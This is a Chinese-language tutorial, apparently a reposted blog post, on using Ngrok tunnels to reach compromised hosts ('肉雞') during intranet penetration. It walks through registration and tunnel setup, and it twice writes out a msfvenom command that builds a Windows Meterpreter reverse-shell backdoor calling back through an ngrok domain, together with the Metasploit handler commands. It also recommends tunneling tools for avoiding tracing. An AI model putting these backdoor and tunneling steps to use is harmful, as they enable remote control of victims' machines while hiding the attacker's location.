目錄

一、準備

1、意義：

2、項目：

二、內網穿透

1、簡介：

三、Ngrok（入門上線）

1、簡述：

2、Ngrok入門上線（國版二開）

3、相關工具：

?2、Ngrok入門上線（美版）

---

---

一、準備

1、意義：

在代理連接肉雞后實現本地滲透肉雞網絡架構

---

2、項目：

Linux：Proxychains
Windows：Sockscap Proxifier
穿透項目：Ngrok Frp Spp Nps EW(停更)
優點：穿透加密數據，中間平臺，防追蹤，解決網絡問題
https://www.ngrok.cc
https://github.com/esrrhs/spp
https://github.com/fatedier/frp
https://github.com/ehang-io/nps
http://www.rootkiter.com/EarthWorm

---

---

二、內網穿透

1、簡介：

1、內網穿透，也即 NAT 穿透，進行 NAT 穿透是為了使具有某一個特定源 IP 地址和源端口號的數據包不被 NAT 設備屏蔽而正確路由到內網主機。下面就相互通信的主機在網絡中與 NAT 設備的相對位置介紹內網穿透方法。

---

2、UDP 內網穿透的實質是利用路由器上的NAT 系統。NAT 是一種將私有（保留）地址轉化為合法IP地址的轉換技術，它被廣泛應用于各種類型 Internet 接入方式和各種類型的網絡中。NAT可以完成重用地址，并且對于內部的網絡結構可以實現對外隱蔽
（來源百度百科）

---

---

三、Ngrok（入門上線）

1、簡述：

1）作用：ngrok 是一個反向代理，通過在公共的端點和本地運行的 Web 服務器之間建立一個安全的通道。ngrok 可捕獲和分析所有通道上的流量，便于后期分析和重放。通過一個命令，便可將一個本地服務器暴露在NAT或防火墻后面的互聯網。

---

2）官方解釋：ngrok是一個簡化的API優先入口即服務，它增加了連接性， 無需更改代碼即可對您的應用程序進行安全性和可觀察性

---

3）我的理解：

關鍵詞：反向代理、公共、本地

通過反向代理，將局域網內的ip:port，轉化為任何用戶上網都可訪問的URL一樣

本地--->Ngrok服務器--->客戶端

---

3）分析：

支持的協議：tcp、http、https
支持的類型：正向代理、反向代理

---

4）工具官網（美國的）：

ngrok - Online in One Linengrok is the fastest way to put anything onthe internet with a single command.https://ngrok.com/

---

5）國產二開的管理平臺：

Sunny-Ngrok

Sunny-Ngrok內網轉發內網穿透 - 國內內網映射服務器https://www.ngrok.cc/

2、Ngrok入門上線（國版二開）

1）注冊并登陸：

Sunny-Ngrok內網轉發內網穿透 - 國內內網映射服務器

點擊進行注冊（免費的）

---

2）服務端配置：
實名認證--->開通隧道--->TCP協議--->指向IP和端口--->開通隧道--->連接隧道

——————

實名認證（2塊錢就可了）

填寫相關信息

?使用支付寶掃碼，進行人臉識別

——————

開通隧道（先拿0元的試手）

——————

TCP協議--->域名進行設置--->指向IP和端口--->添加隧道--->確認開通

注意：

本地端口的填寫，12.0.0.1代表localhost，緊接著的端口號是tomcat的端口號（可查看tomcat的server.xml文件中端口）

?

---

3）連接隧道：

下載客戶端

?根據自己的下載合適的ngrok客戶端

?打開ngrok客戶端

輸入需要啟動的隧道id

實現本地的網站，可以映射到外網了

---

4）客戶端生成后門配置監聽：

msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=80?-f exe -o tcp.exe

（注：lhos：外網ip、lport：外網端口）
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 8888
run

（注：這個監聽端口lport，與本地轉發端口一致）

---

擴展：

隧道管理的地方-->修改-->修改為自定義域名

3、相關工具：

1）natapp

NATAPP -https://natapp.cn/tunnel/buy基本類似使用

2、Ngrok入門上線（美版）

1）下載：

ngrok - downloadhttps://ngrok.com/download

---

2）運行ngrok.exe

---

3）在Ngrok官網 注冊賬號

ngrok - Online in One Linehttps://ngrok.com/在用戶中心找到authtoken（賬戶憑證）

---

方法一：

4）在ngrok命令行中輸入：

ngrok authtoken 加上自己的憑據配置成功會如下提示： （創建.ngrok2文件夾、配置文件ngrok.yml） Authtoken saved to configuration file: C:\Users\****/.ngrok2/ngrok.yml

---

5）連接隧道：

ngrok http 80 （指定的tcp協議，以及自己的服務端口）

---

方法二：

4*）配置賬戶

ngrok config add-authtoken 加上自己的憑據

---

5*）連接隧道

ngrok http 80 （指定的tcp協議，以及自己的服務端口）

---

6）客戶端生成后門配置監聽：
msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengye.com lport=80?-f exe -o tcp.exe

（注：lhos：外網ip、lport：外網端口）
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 8888
run

（注：這個監聽端口lport，與本地轉發端口一致）

總結

以上是生活随笔為你收集整理的【内网安全-隧道搭建】内网穿透_Ngrok上线（美版、国版二开）的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。